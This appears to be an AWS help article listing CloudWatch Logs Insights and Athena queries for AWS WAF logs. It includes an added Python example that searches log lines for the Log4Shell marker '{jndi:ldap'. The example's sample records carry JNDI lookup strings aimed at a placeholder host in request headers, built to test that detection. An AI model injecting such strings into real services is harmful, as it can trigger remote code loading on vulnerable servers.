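What are my options for analyzing AWS WAF logs stored in CloudWatch or Amazon S3?

Last updated: July 11, 2022

I store my AWS WAF logs in Amazon CloudWatch, in Amazon Simple Storage Service (Amazon S3), or in Amazon S3 as the destination of an Amazon Kinesis Data Firehose delivery stream. What are my options for analyzing the AWS WAF access logs?

Resolution

To analyze and filter specific log requests, use Amazon CloudWatch Logs Insights for CloudWatch logs and Amazon Athena for Amazon S3 logs.

Analyze AWS WAF access logs with CloudWatch Logs Insights

  1. Open the Amazon CloudWatch console.
  2. In the navigation pane, choose Logs, and then choose Logs Insights.
  3. For Select log group(s), choose one or more log groups to query that contain the AWS WAF access logs.
  4. (Optional) Choose a time range for the period that you want to query.
  5. Use the query syntax to design your query.
  6. Choose Run to view the results for the log group.

The following example queries filter for specific information in CloudWatch Logs Insights:

Filter on a specific string

Run this query to filter the logs on a specific string:
Note: Replace the string {jndi:ldap with the string that you want to search for.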

fields terminatingRuleId as Rule, action, httpRequest.country as Country, httpRequest.clientIp as ClientIP, httpRequest.httpMethod as Method,httpRequest.uri as URI
| parse @message /\{"name":"[Hh]ost\",\"value":\"(?<Host>[^"}]*)/
| parse @message /\{"name":"[Uu]ser\-[Aa]gent\",\"value\"\:\"(?<UserAgent>[^"}]*)/
| filter @message like "{jndi:ldap"
| sort action, URI desc
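
The same string filter applied offline to log lines downloaded for triage, as an added example that is not part of the original article. It also shows two inputs that the User-Agent parse pattern above does not cover: a header value that contains `}` (the capture stops there) and a header name in a casing other than the two the pattern lists. The sample records, the rule name and the helper names are constructed for illustration.

```python
import json
import re

# The page's User-Agent parse pattern, rewritten with Python's (?P<name>) syntax.
UA_RE = re.compile(r'\{"name":"[Uu]ser-[Aa]gent","value":"(?P<UserAgent>[^"}]*)')

def make_record(rule, action, ip, uri, headers):
    """Build one constructed log line as compact JSON, the shape the regex expects."""
    return json.dumps({
        "terminatingRuleId": rule, "action": action,
        "httpRequest": {"clientIp": ip, "country": "US", "uri": uri,
                        "headers": [{"name": n, "value": v} for n, v in headers]},
    }, separators=(",", ":"))

# Constructed sample data (documentation IP ranges, placeholder host names).
SAMPLE_LOGS = [
    make_record("Hypothetical-BadInputs", "BLOCK", "198.51.100.7", "/login",
                [("Host", "www.example.com"),
                 ("User-Agent", "${jndi:ldap://placeholder.invalid/a} Mozilla/5.0")]),
    make_record("Default_Action", "ALLOW", "203.0.113.9", "/search",
                [("HOST", "www.example.com"), ("USER-AGENT", "curl/8.0"),
                 ("X-Api-Version", "${jndi:ldap://placeholder.invalid/b}")]),
    make_record("Default_Action", "ALLOW", "192.0.2.44", "/",
                [("Host", "www.example.com"), ("User-Agent", "Mozilla/5.0")]),
]

def header(record, name):
    """Case-insensitive header lookup on the parsed record."""
    for h in record["httpRequest"].get("headers", []):
        if h["name"].lower() == name.lower():
            return h["value"]
    return None

def find_matches(lines, needle):
    """Mirror `filter @message like needle` and report both extraction methods."""
    rows = []
    for line in lines:
        if needle not in line:
            continue
        rec = json.loads(line)
        m = UA_RE.search(line)
        rows.append({
            "Rule": rec["terminatingRuleId"], "action": rec["action"],
            "ClientIP": rec["httpRequest"]["clientIp"],
            "UserAgent": header(rec, "user-agent"),       # full value from parsed JSON
            "UserAgentRegex": m.group("UserAgent") if m else None,  # page's pattern
        })
    return rows

if __name__ == "__main__":
    for row in find_matches(SAMPLE_LOGS, "{jndi:ldap"):
        print(row)
```

When the UserAgent column of a query result is empty or looks cut short, check the raw @message before drawing conclusions from it.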

Filter by host

Run this query to filter by host:
Note: Replace the host value www.example.com with the host that you want to search for.

parse @message /\{"name":"[Hh]ost\",\"value":\"(?<Host>[^"}]*)/
| filter Host = "www.example.com"
| fields terminatingRuleId as Rule, action, httpRequest.country as Country, httpRequest.clientIp as ClientIP, httpRequest.uri as URI

Filter by POST requests

Run this query to isolate any POST requests:

parse @message /\{"name":"[Uu]ser\-[Aa]gent\",\"value\"\:\"(?<UserAgent>[^"}]*)/
| parse @message /\{"name":"[Hh]ost\",\"value":\"(?<Host>[^"}]*)/
| fields terminatingRuleId as Rule, action, httpRequest.country as Country, httpRequest.clientIp as ClientIP, httpRequest.httpMethod as Method, httpRequest.uri as URI, httpRequest.requestId as RequestID
| filter httpRequest.httpMethod = "POST"
| display Rule, action, Country, ClientIP, Method, URI, Host, UserAgent, RequestID
| sort Rule, action desc

Filter by UserAgent

Run this query to filter by UserAgent:
Note: Replace User-Agent-Value with your UserAgent.

parse @message /\{"name":"[Uu]ser\-[Aa]gent\",\"value\"\:\"(?<UserAgent>[^"}]*)/
| filter UserAgent like "<User-Agent-Value>"
| fields terminatingRuleId as Rule, action, httpRequest.country as Country, httpRequest.clientIp as ClientIP, httpRequest.uri as URI

Filter requests that don't originate from a country

Run this query to filter requests that don't originate from a specific country:

fields terminatingRuleId as Rule, action, httpRequest.country as Country, httpRequest.clientIp as ClientIP, httpRequest.uri as URI
| parse @message /\{"name":"[Hh]ost\",\"value":\"(?<Host>[^"}]*)/
| parse @message /\{"name":"[Uu]ser\-[Aa]gent\",\"value\"\:\"(?<UserAgent>[^"}]*)/
| filter Country != "US"
| sort Country, action desc

Filter for cross-site scripting or SQL injection

Run this query to filter for cross-site scripting or SQL injection:

fields @timestamp, terminatingRuleId, action, httpRequest.clientIp as ClientIP, httpRequest.country as Country, terminatingRuleMatchDetails.0.conditionType as ConditionType, terminatingRuleMatchDetails.0.location as Location, terminatingRuleMatchDetails.0.matchedData.0 as MatchedData
| filter ConditionType in ["XSS", "SQL_INJECTION"]

Time series based on a terminating rule

Run this query to filter a time series based on a terminating rule:

#Time Series by Terminating Rule
filter terminatingRuleId = "AWS-AWSManagedRulesCommonRuleSet"
| stats count(*) as requestCount by bin(30m)

Blocked requests summarized by ClientIP, country, URI, and rule

Run this query to summarize blocked requests by ClientIP, country, URI, and rule:

fields httpRequest.clientIp as ClientIP, httpRequest.country as Country, httpRequest.uri as URI, terminatingRuleId as Rule
| filter action = "BLOCK"
| stats count(*) as RequestCount by Country, ClientIP, URI, Rule
| sort RequestCount desc

Top client IPs

Run this query to count the top client IPs:

stats count(*) as RequestCount by httpRequest.clientIp as ClientIP
| sort RequestCount desc

Top countries

Run this query to count the top countries:

stats count(*) as RequestCount by httpRequest.country as Country
| sort RequestCount desc

Top hosts

Run this query to count the top hosts:

parse @message /\{"name":"[Hh]ost\",\"value":\"(?<Host>[^"}]*)/
| stats count(*) as RequestCount by Host
| sort RequestCount desc

Top methods

Run this query to count the top methods:

stats count(*) as RequestCount by httpRequest.httpMethod as Method
| sort RequestCount desc

Top terminating rules

Run this query to count the top terminating rules:

stats count(*) as RequestCount by terminatingRuleId
| sort RequestCount desc

Top UserAgents

Run this query to count the top UserAgents:

parse @message /\{"name":"[Uu]ser\-[Aa]gent\",\"value\"\:\"(?<UserAgent>[^"}]*)/
| stats count(*) as RequestCount by UserAgent
| sort RequestCount desc

Requests not terminated by Default_Action or by a rule with an ALLOW action

Run this query to filter requests that weren't terminated by Default_Action or by a rule with an ALLOW action:

fields @timestamp, terminatingRuleId, action, @message
| filter terminatingRuleId != 'Default_Action' and action != 'ALLOW'
| sort @timestamp desc

Requests that contain an invalid Captcha token

Run this query to filter on requests that contain an invalid Captcha token:

fields @timestamp, httpRequest.clientIp, httpRequest.requestId, captchaResponse.failureReason, @message
| filter captchaResponse.failureReason = 'TOKEN_MISSING'
| sort @timestamp desc

Requests blocked by a rate-based rule

Run this query to filter on requests blocked by a rate-based rule:

fields @timestamp, httpRequest.clientIp, terminatingRuleId, httpRequest.country, @message
| filter terminatingRuleType = "RATE_BASED"
# Uncomment the next line to filter for a specific WebACL
# | filter webaclId = "arn:aws:wafv2:us-east-1:xxxxxxxx:regional/webacl/waf-test/abcdefghijkl"
| sort @timestamp desc

Filter all requests detected by AWS Bot Control (ABC)

Run this query to filter all requests detected by ABC:

fields @timestamp, @message
| filter @message like 'awswaf:managed:aws:bot-control'
| parse @message '"labels":[*]' as Labels
| sort @timestamp desc

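Analyze AWS WAF access logs with Amazon Athena

You can turn on AWS WAF access logging directly to an Amazon S3 bucket. Alternatively, you can use an Amazon Kinesis Data Firehose delivery stream to deliver your AWS WAF access logs to an Amazon S3 bucket. To store logs in Amazon S3, see How do I configure AWS WAF comprehensive logging to store logs in Amazon S3?

When your access logs are in the Amazon S3 bucket, create the AWS WAF table so that you can use Amazon Athena to query the logs and filter on various details.

The following example queries can be used to query AWS WAF logs through Athena:

Blocked requests with AWS WAF rule information

Run this Athena query to list all blocked requests together with the AWS WAF rule: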

SELECT timestamp,
    action,
    httpsourcename,
    httpsourceid,
    httprequest.requestID,
    httprequest.clientip,
    webaclid,
    terminatingruleid,
    terminatingruletype,
    rulegrouplist,
    terminatingrulematchdetails
FROM "wafv2"."waf_logs"
WHERE ("action" LIKE 'BLOCK')

Request user agent

Run this Athena query to request the user agent:
Note: Replace User-Agent with your UserAgent value.

select n.value, count(n.value) as count
from waf_logs
cross join
unnest(
  cast(
    httprequest.headers as ARRAY(ROW(name VARCHAR, value VARCHAR))
    )
  ) as x(n)
where n.name = 'User-Agent'
group by n.value
ORDER BY count(n.value) DESC

Request URI

Run this Athena query to check the request URI:

SELECT
"httprequest"."uri"
, "count"(*) "count"
FROM
  waf_logs
WHERE ("action" LIKE 'BLOCK')
GROUP BY "httprequest"."uri"
ORDER BY "count" DESC

Count blocked requests based on ClientIP

Run this Athena query to view the count of blocked requests based on ClientIP and country:

SELECT
  "httprequest"."clientip"
, "count"(*) "count"
, "httprequest"."country"
FROM
waf_logs
WHERE ("action" LIKE 'BLOCK')
GROUP BY "httprequest"."clientip", "httprequest"."country"
ORDER BY "count" DESC

View request count

Run this Athena query to view the request count:

SELECT
  "httprequest"."clientip"
, "count"(*) "count"
, "httprequest"."country"
FROM
  waf_logs
WHERE ("action" LIKE 'BLOCK')
GROUP BY "httprequest"."clientip", "httprequest"."country"
ORDER BY "count" DESC

For additional Athena query examples, see Example queries for AWS WAF logs.

